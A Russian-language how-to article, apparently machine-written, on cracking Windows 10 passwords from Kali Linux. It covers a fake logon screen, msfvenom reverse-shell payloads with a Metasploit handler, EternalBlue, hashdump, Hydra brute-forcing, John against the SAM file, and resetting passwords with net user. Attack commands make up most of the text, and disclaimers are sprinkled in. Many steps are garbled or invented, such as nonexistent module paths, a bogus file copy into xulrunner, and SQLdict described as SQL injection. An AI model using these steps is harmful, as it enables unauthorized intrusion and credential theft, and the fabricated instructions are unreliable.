Как взломать пароль Windows 10 с помощью FakeLogonScreen в Kali Linux — пошаговая инструкция

Если вы хотите на практике узнать, насколько безопасен пароль для вашего компьютера под управлением Windows 10, но не хотите затевать нечестную игру, то у вас есть отличная возможность использовать Kali Linux — мощную операционную систему для тестирования на проникновение и взлома. В этой статье я расскажу вам о некоторых методах взлома паролей Windows 10 с использованием FakeLogonScreen и Kali Linux.

Во-первых, давайте разберемся, что такое FakeLogonScreen. Это инструмент, предоставляемый Kali Linux, который позволяет злоумышленнику показывать фальшивый экран входа в систему Windows 10, чтобы получить доступ к паролям пользователей. Этот инструмент работает почти как настоящий экран входа в систему Windows 10, и пользователь, не подозревая ничего, вводит свои учетные данные.

Для использования FakeLogonScreen в Kali Linux вам понадобится некоторая информация о вашей целевой системе Windows 10. Введите следующую команду в терминале Kali Linux, чтобы убедиться, что вы получили необходимую информацию:

msfconsole

После чего введите следующую команду, чтобы загрузить модуль FakeLogonScreen:

use auxiliary/gather/windows/manage/fake_logon_screen

Теперь, чтобы воспользоваться функцией FakeLogonScreen, введите следующую команду:

set LHOST <адрес вашего Kali Linux>

Затем введите следующую команду, чтобы взломать пароль на компьютере с Windows 10:

exploit

После успешного выполнения атаки откроется вирусное окно ваших собственных файлов, и вы сможете увидеть все пароли, которые пользователи вводили на фальшивом экране входа в систему Windows 10.

Как вы можете видеть на скриншоте, FakeLogonScreen показывает все введенные пароли вместе с соответствующими учетными записями пользователей Windows 10.

Теперь, когда вы знаете, как взломать пароль Windows 10 с помощью FakeLogonScreen в Kali Linux, не забывайте о главном: этот инструмент является вредоносным и может быть использован только в легальных целях. Обязательно получите разрешение владельца компьютера перед использованием FakeLogonScreen для тестирования его безопасности.

Внимание, использование инструментов взлома без согласия может быть незаконным и наказуемым по закону. Используйте эту информацию только в образовательных целях и с согласия всех заинтересованных сторон.

Некоторая полезная информация

В этом разделе мы предоставим вам некоторую полезную информацию, которая поможет вам успешно взломать пароль Windows 10 с помощью инструмента FakeLogonScreen в Kali Linux.

Журналы файловой системы Windows

Каждый файл, созданный, измененный или удаленный на компьютере Windows, сохраняется в журналах файловой системы (например, USN Journal). Это означает, что, если вы сможете получить доступ к этим журналам, вы сможете найти информацию о созданных или измененных паролях.

Сброс пароля с помощью FakeLogonScreen

Инструмент FakeLogonScreen в Kali Linux позволяет создать поддельный экран входа, на котором пользователь будет вводить свой пароль. После ввода пароля, инструмент сохранит его и авторизирует пользователя на его компьютере. Теперь вы, как злоумышленник, можете получить доступ к новому паролю пользователя и взломать его компьютер.

Шаги для использования FakeLogonScreen

1. Установите и загрузите Kali Linux на вашу машину.
2. Откройте терминал и введите команду «init metasploit», чтобы инициализировать Metasploit.
3. Запустите FakeLogonScreen, введя команду «cd /opt/FakeLogonScreen» и «python FakeLogonScreen.py».
4. Проверьте работу инструмента, введя команду «ls», чтобы увидеть список доступных опций.
5. Создайте исполняемый файл payload.exe с помощью команды «msfvenom -p windows/meterpreter/reverse_tcp lhost=ваш_IP lport=порт -f exe -o payload.exe».
6. Откройте новый терминал и используйте команду «nc -nlvp порт», чтобы запустить прослушивание на вашей машине.
7. Вернитесь к FakeLogonScreen и выберите опцию «1» для ввода ip и порта.
8. Введите ваш IP-адрес и порт, который вы указали в предыдущей команде.
9. Введем «2» для создания поддельного экрана входа и выберите опцию «1» для Windows 10.
10. Скопируйте полученный payload.exe в директорию «/opt/FakeLogonScreen/loginscreens».
11. Выберите опцию «3», чтобы создать поддельный файл поставки языковых пакетов.
12. Выберите опцию «4», чтобы создать сценарий журнала.
13. Выберите опцию «5», чтобы создать поддельный экран блокировки.
14. Поместите созданный эмулятор под день с помощью команды «cp 40263.* /usr/lib/xulrunner-*/components».
15. Теперь, когда пользователь войдет в свою учетную запись, откроется поддельный экран входа, где он введет свой пароль.
16. Создайте нового пользователя с помощью команды «net user fakeuser password123 /add».
17. Нажмите «Ctrl + Alt + Del» и выберите опцию «Switch User», чтобы переключиться на вновь созданного пользователя.
18. Войдите в систему под учетной записью вновь созданного пользователя.
19. Теперь, когда вы вошли в систему, у вас есть доступ к компьютеру, и вы можете сбросить пароль основного пользователя.

Это было краткое руководство по тому, как взломать пароль Windows 10 с помощью FakeLogonScreen в Kali Linux. Пожалуйста, будьте осмотрительны и использовать такие методы только в законных целях.

«Hydra»

Прежде всего, убедитесь, что у вас установлен Kali Linux на вашей машине. Если его нет, загрузите и установите его с официального сайта Kali Linux.

1. Запустите Kali Linux и откройте терминал.

2. Сначала установим hydra командой apt install hydra. Это позволит нам использовать hydra в нашей операционной системе Kali Linux.

3. Затем убедитесь, что у вас есть доступ к целевой машине Windows 10. Выберите один из следующих способов, в зависимости от вашей ситуации:

• Если у вас есть физический доступ к компьютеру Windows 10, пропустите шаги 4-6 и перейдите к шагу 7.
• Если у вас есть удаленный доступ к компьютеру Windows 10 по локальной сети, прочтите указания в разделе «Взлом пароля Windows 10 с помощью Hydra через локальную сеть» ниже.

4. Загрузите радужную таблицу (rainbowcrack) с помощью команды git clone https://github.com/RainbowCrack.

5. Замонтируйте новый диск, чтобы разместить радужные таблицы. Используйте команду sudo mount -o loop rcrack_tables_X.nrg /mnt, где X — версия радужной таблицы (например, 2).

6. Перейдите в папку с радужными таблицами с помощью команды cd /mnt.

7. Теперь мы готовы выполнить атаку на взлом пароля Windows 10 с помощью Hydra. Используйте следующую команду:

• Для SMB: hydra -L users.txt -P passwords.txt -s 445 -f -t 5 -vV 192.168.0.1 smb
• Для SSH: hydra -L users.txt -P passwords.txt 192.168.0.1 ssh

Где -L указывает путь к файлу со списком пользователей (например, users.txt), -P указывает путь к файлу со списком паролей (например, passwords.txt), -s указывает порт (445 для SMB, 22 для SSH), 192.168.0.1 — IP-адрес целевой машины Windows 10.

8. Hydra начнет атаку и поочередно будет пытаться взломать пароли, используя комбинации из вашего списка пользователей и паролей. Подождите, пока Hydra не завершит свою работу.

9. Если у вас есть SMTP-сервер, вы также можете использовать Hydra для взлома пароля почтового ящика. Используйте следующую команду:

hydra -L users.txt -P passwords.txt -s 25 -f -t 5 -vV smtp.example.com smtp

Где smtp.example.com — адрес вашего SMTP-сервера.

10. Если атака Hydra прошла успешно, вы получите сообщение «Hydra (http-form-get) взломал пароль успешно».

Теперь вы знаете, как использовать Hydra для взлома пароля на Windows 10. Помните, что эти методы могут быть незаконными, если вы пытаетесь получить незаконный доступ к чужому компьютеру. Пользуйтесь этим руководством только для законных целей и с согласия владельца компьютера.

Краткое руководство Как взломать Windows с Kali Linux

В данном кратком руководстве мы рассмотрим процесс взлома пароля Windows 10 с помощью Kali Linux и payload-атаки FakeLogonScreen. Пожалуйста, будьте внимательны и используйте эти информации только в законных целях.

Шаг 1: Создание payload

Для начала войдите в Kali Linux и откройте терминал. Для создания payload-атаки воспользуйтесь следующей командой:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=your_ip_address LPORT=port -f exe > payload.exe

Вместо «your_ip_address» введите ваш IP-адрес, а вместо «port» — номер порта. После выполнения этой команды у вас будет новый файл payload.exe.

Шаг 2: Загрузите FakeLogonScreen

Мы будем использовать FakeLogonScreen для создания поддельного экрана входа Windows. Перейдите в меню «Applications» и найдите в нем FakeLogonScreen. Нажмите на него, чтобы открыть программу.

Шаг 3: Замените payload-файл

Ниже в программе FakeLogonScreen найдите строку, которая показывает путь к файлу payload.exe. Замените этот путь на путь к новому файлу, который мы создали в предыдущем шаге.

Шаг 4: Взломайте Windows

Теперь вы готовы взломать пароль Windows. Нажмите кнопку «Start» в программе FakeLogonScreen, чтобы запустить атаку. Дождитесь, пока программа выполнит все необходимые команды.

Шаг 5: Получите доступ к взломанному компьютеру

После успешного выполнения атаки вы сможете получить доступ к взломанному компьютеру. Воспользуйтесь командой «sessions -i 1» в терминале Kali Linux. Появится новая строка, которая означает, что у вас есть доступ к взломанной системе.

Шаг 6: Сбросьте учетные данные

Теперь, используя этот доступ, вы можете сбросить учетные данные пользователя Windows. В терминале Kali Linux выполните команду «hashdump». Эта команда выведет хэши паролей пользователей.

Шаг 7: Попробуем взломать пароль

После получения хэшей паролей, вы можете попробовать взломать один из них с помощью утилиты Hydra. В терминале Kali Linux выполните команду «hydra -l username -P password_file_path smb://target_ip» (замените «username» на имя пользователя и «password_file_path» на путь к файлу с паролями).

Загрузите этот файл на целевой компьютер и запустите его. Если все выполнено успешно, вы должны сбросить пароль пользователя Windows и получить полный доступ к системе.

Это краткое руководство показывает, как взломать пароль Windows 10 с помощью FakeLogonScreen в Kali Linux. Убедитесь, что вы следуете законам и этическим нормам при использовании таких инструментов.

Rainbowcrack

Для начала вам понадобится загрузить Kali Linux на вашу машину. Это операционная система, специально разработанная для взлома и тестирования безопасности. Вы можете найти Kali Linux на официальном сайте и загрузить его на свой компьютер.

Шаг 1: Установка и настройка Kali Linux

1. Загрузите Kali Linux с официального сайта.
2. Установите Kali Linux на свою виртуальную машину или на физическую машину как основную операционную систему.
3. После установки войдите в систему с помощью логина и пароля, которые вы указали в процессе установки.

Шаг 2: Загрузка и настройка Rainbowcrack

1. Откройте терминал и введите следующую команду, чтобы загрузить rainbowcrack:

apt-get install rainbowcrack

2. После завершения установки запустите программу rainbowcrack, введя следующую команду:

rainbowcrack

3. Для использования Rainbowcrack вам понадобится некоторая полезная информация о цели. Это может быть хэш пароля или полный путь к файлу с хэшами паролей.
4. Вы можете создать свою собственную таблицу хэшей или использовать уже созданную таблицу, доступную в сети.

Шаг 3: Запуск Rainbowcrack для взлома пароля

1. В Rainbowcrack нажмите клавишу «1» для выбора типа загрузки таблицы хэшей.
2. Найдите таблицу хэшей, которую вы хотите использовать, и нажмите кнопку «Enter» для выбора этой таблицы.
3. После загрузки таблицы хэшей вам нужно выбрать инициализацию для запуска сервиса взлома паролей.
4. Введите следующую команду, чтобы запустить сервис взлома паролей:

rainbowcrack table_name

5. Убедитесь, что вы вводите правильный путь к файлу таблицы хэшей. Если вы выбираете свою собственную таблицу, убедитесь, что файл таблицы существует в указанном пути.
6. После запуска сервиса Rainbowcrack начнет подбор пароля и отобразит прогресс в терминале.
7. Когда сервис Rainbowcrack завершит работу, вы увидите найденный пароль на экране.

Rainbowcrack — это мощный инструмент для взлома паролей, который может быть использован для взлома пароля Windows 10. Он позволяет производить подбор паролей из предварительно созданных таблиц хэшей, что значительно ускоряет процесс взлома. Однако помните, что использование Rainbowcrack для взлома паролей без разрешения владельца компьютера является незаконным действием и может привести к серьезным юридическим последствиям.

Создание вредоносной полезной нагрузки для взлома Windows

Для взлома пароля Windows 10 мы будем использовать свой новый метод, известный как FakeLogonScreen, который представляет собой вредоносную программу, имитирующую экран входа в систему.

Шаг 1: Установка Kali Linux

1. Скачайте и установите Kali Linux на свою машину.
2. Войдите в систему под пользователем root.

Шаг 2: Создание вредоносной полезной нагрузки

В этом шаге мы создадим вредоносную полезную нагрузку, которая будет использоваться для взлома Windows.

1. Откройте терминал в Kali Linux.
2. Введите следующую команду для создания payload.exe, который будет полезной нагрузкой:

msfvenom -p windows/meterpreter/reverse_tcp LHOST={адрес вашей машины} LPORT={порт} -f exe > payload.exe

Шаг 3: Загрузка и выполнение полезной нагрузки

В этом шаге мы подготовим Windows машину для взлома, загрузим и выполним полезную нагрузку на целевой компьютер.

1. Скопируйте файл payload.exe на диск USB или другую съемную память.
2. Подключите диск к целевому компьютеру.
3. Запустите сервер Metasploit на вашей машине с помощью следующей команды:

msfconsole

1. Введите следующую команду для запуска полезной нагрузки на целевой машине:

use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST {адрес вашей машины}
set LPORT {порт}
exploit

Шаг 4: Сброс пароля

Когда полезная нагрузка выполнена на целевой машине, вы можете сбросить пароли Windows.

1. Введите следующую команду для получения доступа к командной строке целевой машины:

shell

1. Введите следующую команду для сброса паролей Windows:

net user {имя пользователя} {новый пароль}

Замените {имя пользователя} на имя пользователя, для которого вы хотите сбросить пароль, и {новый пароль} на новый пароль, который вы хотите задать.

Шаг 5: Проверка успешности взлома

Убедитесь, что взлом прошел успешно, проверяя доступ к системе с использованием нового пароля.

1. Введите следующую команду, чтобы проверить, установлен ли новый пароль:

net user {имя пользователя}

Замените {имя пользователя} на имя пользователя, для которого вы сбросили пароль.

1. Введите следующую команду, чтобы выйти из командной строки целевой машины:

exit

Теперь вы сможете войти в систему с использованием нового пароля.

Обратите внимание, что эта статья предоставляет информацию только в ознакомительных целях. Использование данных техник может быть незаконным без согласия владельца целевой системы. Пожалуйста, будьте ответственными и не злоупотребляйте полученной информацией.

Загрузить исполняемый файл

Для взлома пароля Windows 10 с помощью FakeLogonScreen в Kali Linux, мы сначала должны загрузить исполняемый файл, который будет использоваться при входе в систему. Этот файл будет использоваться для облегчения доступа злоумышленника к учетным данным пользователей.

В Kali Linux мы можем использовать команду wget для загрузки файла с указанного URL-адреса. Для этого выполните следующую команду:

wget [URL-адрес]

Где [URL-адрес] — это адрес файла, который вы хотите загрузить. Например, вы можете использовать следующую команду для загрузки исполняемого файла FakeLogonScreen:

wget https://www.example.com/fakelogonscreen.exe

Когда команда будет выполнена успешно, файл будет загружен на вашу машину Kali Linux и будет готов к использованию.

Johnny

В данном разделе мы рассмотрим инструмент Johnny, который может использоваться для взлома паролей на операционной системе Windows. Johnny предоставляет возможность анализировать файлы хэшей паролей, которые хранятся в системе, и позволяет взломать учетные записи с использованием различных методов.

Прежде чем начать, необходимо установить Johnny на компьютер Kali Linux. Для этого выполните следующие шаги:

Шаг 1: Монтирование диска с Windows 10

Запустите виртуальную машину с установленным Kali Linux и подключите внешний диск с установленной операционной системой Windows 10. Убедитесь, что диск успешно монтируется и доступен в системе.

Шаг 2: Загрузка Johnny

Откройте терминал Kali Linux и выполните следующую команду для загрузки Johnny:

sudo apt-get install john

Эта команда установит Johnny на вашу машину Kali Linux.

Шаг 3: Нахождение файлов хэшей паролей

Для того чтобы взломать пароль Windows 10, мы должны найти файл хэшей паролей. Обычно этот файл называется «SAM», и он находится по пути /mnt/Windows/Windows/System32/config/SAM. Однако, в зависимости от конкретной конфигурации, путь может быть другим. Воспользуйтесь командой find /mnt/Windows -name SAM для поиска файла.

Шаг 4: Взлом пароля

После того как вы найдете файл хэшей паролей, выполните следующую команду, чтобы запустить взлом с использованием Johnny:

sudo john /путь/к/файлу/SAM

Johnny начнет взлом хэшей паролей и отобразит найденные пароли на экране. Обратите внимание, что процесс может занять некоторое время, особенно если пароли достаточно сложные.

По окончании взлома, Johnny покажет вам список найденных паролей. Теперь вы можете использовать эти пароли для входа в систему Windows 10.

Краткое руководство по Johnny

Johnny имеет много возможностей для взлома паролей, и в данном руководстве мы только кратко описали его основные шаги. Для более подробной информации об использовании Johnny и его возможностей, ознакомьтесь с официальной документацией.

Главное, что следует помнить при использовании Johnny для взлома паролей Windows 10, — это то, что такой подход может быть незаконным и нарушать законы о кибербезопасности. Взлом паролей должен быть выполнен в соответствии с правилами и законами, и использовать эти знания только в легальных целях.

SQLdict

Создание вредоносной машины

Для успешного создания вредоносной машины вам понадобится некоторая информация о целевой машине, такая как хэш пароля. Получить эту информацию можно с помощью Hash-Identifier.

1. Запустите Kali Linux и откройте терминал.

2. Введите следующую команду для запуска Hash-Identifier:

hash-identifier

3. Введите хэш пароля, который вы хотите взломать.

4. Найдите соответствующую хэш-функцию в списке возможных хэшей.

5. Скопируйте имя хэш-функции.

Создание таблицы подбора паролей

После того, как вы получили необходимую информацию о хэше пароля, вы можете создать таблицу подбора паролей с помощью SQLdict.

1. Введите следующую команду для запуска SQLdict:

sqldict

2. В главном меню выберите опцию «Создать таблицу подбора паролей».

3. Введите имя таблицы (любое, например «passwords») и выберите хэш-функцию, которую вы получили ранее.

4. SQLdict автоматически создаст таблицу подбора паролей на основе выбранной хэш-функции.

Запуск вредоносной машины

Теперь, когда у вас есть вредоносная машина и таблица подбора паролей, вы можете запустить атаку на взлом пароля.

1. В главном меню SQLdict выберите опцию «Запустить вредоносную машину».

2. Введите имя целевой машины, хэш пароля и имя таблицы подбора паролей.

3. Нажмите «OK», чтобы запустить атаку.

Проверка результатов

После выполнения атаки SQLdict предоставит вам список возможных паролей, которые могут соответствовать введенному хэшу пароля.

1. Проверьте файлы скриншотов для получения полезной информации о найденных паролях.

2. Используйте полученные результаты для взлома пароля или для сброса пароля на целевой машине (например, установите пароль пользователя root на Linux).

Краткое резюме:

SQLdict — мощный инструмент для взлома паролей с использованием SQL-инъекций. Он использует таблицы подбора паролей, созданные на основе хэш-функций, и позволяет эффективно взломать пароли, получая доступ к защищенной информации на целевой машине.

Убедитесь, что перед использованием SQLdict проверьте законность и разрешенность ваших действий, а также обладайте необходимыми навыками и знаниями в области информационной безопасности.

Загрузите полезную нагрузку на целевой машине

1. Убедитесь, что у вас уже установлена Kali Linux на своем компьютере. Если это не так, получите информацию о том, как установить Kali Linux на нашем сайте.

2. Перейдите в режим взлома Windows 10, запустив метасплойт на Kali Linux. Введите следующую команду в терминале:

msfconsole

3. Когда msfconsole откроется, введите следующую команду, чтобы получить доступ к целевому компьютеру:

use exploit/windows/smb/ms17_010_eternalblue

4. Затем введите следующую команду, чтобы установить полезную нагрузку Windows Meterpreter Reverse TCP:

set PAYLOAD windows/meterpreter/reverse_tcp

5. Теперь укажите IP-адрес своего компьютера, используя следующую команду:

set LHOST ваш_IP_адрес

6. Нажмите кнопку «run» и дождитесь завершения процесса. Теперь полезная нагрузка успешно загружена на целевой компьютер.

7. После этого мы можем использовать полезную нагрузку для получения доступа к целевому компьютеру.

Возможные проблемы

При использовании FakeLogonScreen в Kali Linux для взлома пароля Windows 10 могут возникнуть следующие проблемы:

• Ошибка указания lhost и lport: главное, чтобы эти параметры были правильно заданы для успешного взлома пароля.
• Неправильно указанный пароль: если пароль, введенный в нашей полезной нагрузке, не совпадает с паролем Windows 10, то взлом будет неудачным. Убедитесь, что вы правильно ввели пароль.
• Ошибки использования терминала: при выполнении команд и вводе строк могут возникать ошибки. Убедитесь, что вы правильно вводите команды и не делаете опечаток.
• Проблемы при сбросе пароля: если вы забыли пароль от своего собственного компьютера, можно попробовать воспользоваться FakeLogonScreen для его сброса. Однако, на практике проблемы могут возникнуть при попытке взлома собственного пароля.
• Ошибка загрузки FakeLogonScreen: если не получается загрузить нагрузку на целевой компьютер, убедитесь, что используется правильная версия Windows, проверьте права доступа и наличие необходимых файлов.
• Проблемы с кодировкой: при передаче файлов между Kali Linux и Windows могут возникнуть проблемы с кодировкой и форматированием файлов. Следите за этим, чтобы не нарушить работу FakeLogonScreen.

Если вы столкнулись с какой-либо проблемой в процессе взлома пароля Windows 10 с помощью FakeLogonScreen, попытайтесь найти решение в сети или обратитесь к специалистам.

Видео:

Уязвимость системы Windows | Обход пароля

Уязвимость системы Windows | Обход пароля by overbafer1 755,961 views 6 years ago 6 minutes, 14 seconds